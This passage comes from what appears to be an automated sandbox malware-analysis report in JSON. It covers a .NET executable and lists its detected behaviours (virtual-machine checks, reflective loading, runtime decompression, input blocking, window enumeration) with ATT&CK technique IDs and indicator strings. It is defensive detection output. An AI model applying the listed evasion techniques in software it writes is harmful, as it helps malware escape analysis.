\"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"MISSINGDEPENDENCIES\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\6FAF58\\19AB8D57\\10\"; Key: \"DISPLAYNAME\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\6FAF58\\19AB8D57\\10\"; Key: \"CONFIGMASK\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\6FAF58\\19AB8D57\\10\"; Key: \"CONFIGSTRING\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\6FAF58\\19AB8D57\\10\"; Key: \"MVID\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\6FAF58\\19AB8D57\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\6FAF58\\19AB8D57\\10\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\IL\\75638FEE\\2CBE1E8B\\10\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\PUBLISHERPOLICY\\DEFAULT\\POLICY.2.0.SYSTEM.DATA.SQLXML__B77A5C561934E089\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\APPPATCH\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\APPPATCH\\V4.0.30319.00000\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\\POLICY\\APPPATCH\\V4.0.30319.00000\\MSCORWKS.DLL\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\APPID_CATALOG\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\APPID_CATALOG\\0F22DD89\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\00000036\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify virtual environment using user register activity\n Matched sigs: Possibly tries to evade analysis by sleeping many times", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "Found reference to \"MD5CryptoServiceProvider\" (Indicator: \"MD5CryptoServiceProvider\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to \"HashAlgorithm\" (Indicator: \"HashAlgorithm\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to \"MD5CryptoServiceProvider\" (Indicator: \"MD5CryptoServiceProvider\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to \"HashAlgorithm\" (Indicator: \"HashAlgorithm\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-145", "type": 2, "relevance": 1, "name": "Found virtual disk drive like strings", "description": "Found string - winmgmts:\\\\.\\root\\SecurityCenter2; Source: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string - inmgmts:\\\\.\\root\\SecurityCenter2; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-107", "relevance": 1, "name": "Contains ability to load content into memory (Dotnet)", "description": "Observed namespace \"System.IO.MemoryStream\" and TypeReference \".ctor\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.IO.MemoryStream\" and TypeReference \"Write\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.IO.MemoryStream\" and TypeReference \"ToArray\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.IO.MemoryStream\" and TypeReference \"get_Length\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.IO.MemoryStream\" and TypeReference \"WriteByte\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.IO.MemoryStream\" and TypeReference \"set_Position\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"System.IO.MemoryStream\" and TypeReference \"Read\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-116", "relevance": 1, "name": "Contains ability to decompress content at runtime", "description": "Observed function \"System.IO.Compression.GZipStream\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-115", "relevance": 1, "name": "Dotnet code contains potential unpacker", "description": "Observed function \"System.Reflection.Load\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00005928-00000105-549075 [PID: 5928]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005928-00000105-836584 [PID: 5928]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005928-00000105-2141453 [PID: 5928]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005928-00000105-2908439 [PID: 5928]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005928-00000105-3924636 [PID: 5928]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005928-00000105-4377587 [PID: 5928]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005928-00000105-5862206 [PID: 5928]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-135", "relevance": 1, "name": "Dotnet file contains function to dynamically call methods at runtime", "description": "Observed namespace \"Microsoft.VisualBasic.CompilerServices\" and MemberReference \"LateCall\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-547", "type": 2, "relevance": 1, "name": "Contains ability to block user input (API string)", "description": "Found reference to API \"BlockInput_\" (Indicator: \"BlockInput\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"BlockInput_1\" (Indicator: \"BlockInput\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"BlockInput\" (Indicator: \"BlockInput\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"BlockInput_\" (Indicator: \"BlockInput\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"BlockInput_1\" (Indicator: \"BlockInput\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"BlockInput\" (Indicator: \"BlockInput\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetWindowText\" (Indicator: \"GetWindowText\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetWindowTextLength\" (Indicator: \"GetWindowText\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindowEx\" (Indicator: \"FindWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"_FindWindow_\" (Indicator: \"FindWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindow_\" (Indicator: \"FindWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetWindowTextLengthA\" (Indicator: \"GetWindowText\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindow\" (Indicator: \"FindWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"11147058367,5956,108,,GetWindowTextA,user32.dll,\"252:02:41.282\",RX=0,PX=0\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005756.00000000.65858.00050000.00000004.mdmp\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"GetWindowText\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"GetWindowTextLength\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindowEx\" (Indicator: \"FindWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"_FindWindow_\" (Indicator: \"FindWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindow_\" (Indicator: \"FindWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"GetWindowTextLengthA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindow\" (Indicator: \"FindWindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"84419392382,5956,108,,GetWindowTextA,user32.dll,\"252:05:32.611\",RX=0,PX=0\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp\")\n Found reference to API \"155176098464,5956,108,,GetWindowTextA,user32.dll,\"252:07:53.695\",RX=0,PX=0\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005756.00000002.69706.00050000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-162", "type": 2, "relevance": 1, "name": "Contains ability to retrieve volume information (API string)", "description": "Found reference to API \"GetVolumeInformation\" (Indicator: \"GetVolumeInformation\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"GetVolumeInformation\" (Indicator: \"GetVolumeInformation\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-663", "type": 2, "relevance": 1, "name": "Able to identify virtual environment using user register activity", "description": "Found string \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" (Indicator: \"software\\microsoft\\windows\\currentversion\\uninstall\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" (Indicator: \"software\\microsoft\\windows\\currentversion\\uninstall\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"KEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" (Indicator: \"software\\microsoft\\windows\\currentversion\\uninstall\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-351", "type": 2, "relevance": 1, "name": "Found registry location string related to processor", "description": "Observed string: \"KEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" (Indicator: \"hardware\\description\\system\\centralprocessor\") in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-413", "type": 2, "relevance": 1, "name": "Contains ability to find open windows (API string)", "description": "Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000212f4000088ef0700 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000636d996a00004600000000006c6d996a7b1e40d3d8d79d656cf6240068f6240000000000000000000000000000000000d8d79d65c0f524000000000030f624006cf6240000f62400ff23996ac83ba26a40f624003117996a080000001c5cd77714a1d877ffffffff2400000028f62400 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000050000050af40000986e0700a8f0070000000000000000000200000212f4000088ef0700 (UID: 00000000-00005756)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100007c42f3770000d377000000009238706ad000d37702000000000000008800000095e1d477b8751c00459d7f7700004b0000000000800000000200000000001d009c1d0574cc751c006c22057480000000d3220574dcf00574e8751c00741d0574dcf005740000000018771c0000000000 (UID: 00000000-00005928)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebeb7750b1330000f0fd7f9a5cd97700e0fd7f90751c0044f0fd7f00000000400000003f0000002000000000f0fd7f84751c00c15cd9776082e0772000000000f0fd7f9a5cd97700e0fd7fa8751c005789d8778083e0771317d375d8ebeb77 (UID: 00000000-00005928)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-350", "type": 2, "relevance": 1, "name": "Found registry location string related to BIOS", "description": "Observed string: \"HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\BIOS\" (Indicator: \"hardware\\description\\system\\bios\") in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n Observed string: \"KEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\BIOS\" (Indicator: \"hardware\\description\\system\\bios\") in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-326", "type": 2, "relevance": 1, "name": "Contains ability to retrieve environment variable settings", "description": "Found string \"set cdaudio door open\" (Indicator: \"set \"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"set cdaudio door closed\" (Indicator: \"set \"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"FindWindowEx\" (Indicator: \"findwindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"_FindWindow_\" (Indicator: \"findwindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"_SendMessage\" (Indicator: \"sendmessage\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindow_\" (Indicator: \"findwindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"SendMessage_\" (Indicator: \"sendmessage\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"SendMessage\" (Indicator: \"sendmessage\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FindWindow\" (Indicator: \"findwindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"SendMessageTimeout\" (Indicator: \"sendmessage\"; Source: \"00000000-00005756-00000C29-50368561\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; Source: \"00000000-00005756-00000C29-50369255\")\n Found reference to API \"FindWindowEx\" (Indicator: \"findwindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"_FindWindow_\" (Indicator: \"findwindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"_SendMessage\" (Indicator: \"sendmessage\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"FindWindow_\" (Indicator: \"findwindow\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"SendMessage_\" (Indicator: \"sendmessage\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"SendMessage\" (Indicator: \"sendmessage\"; Source: 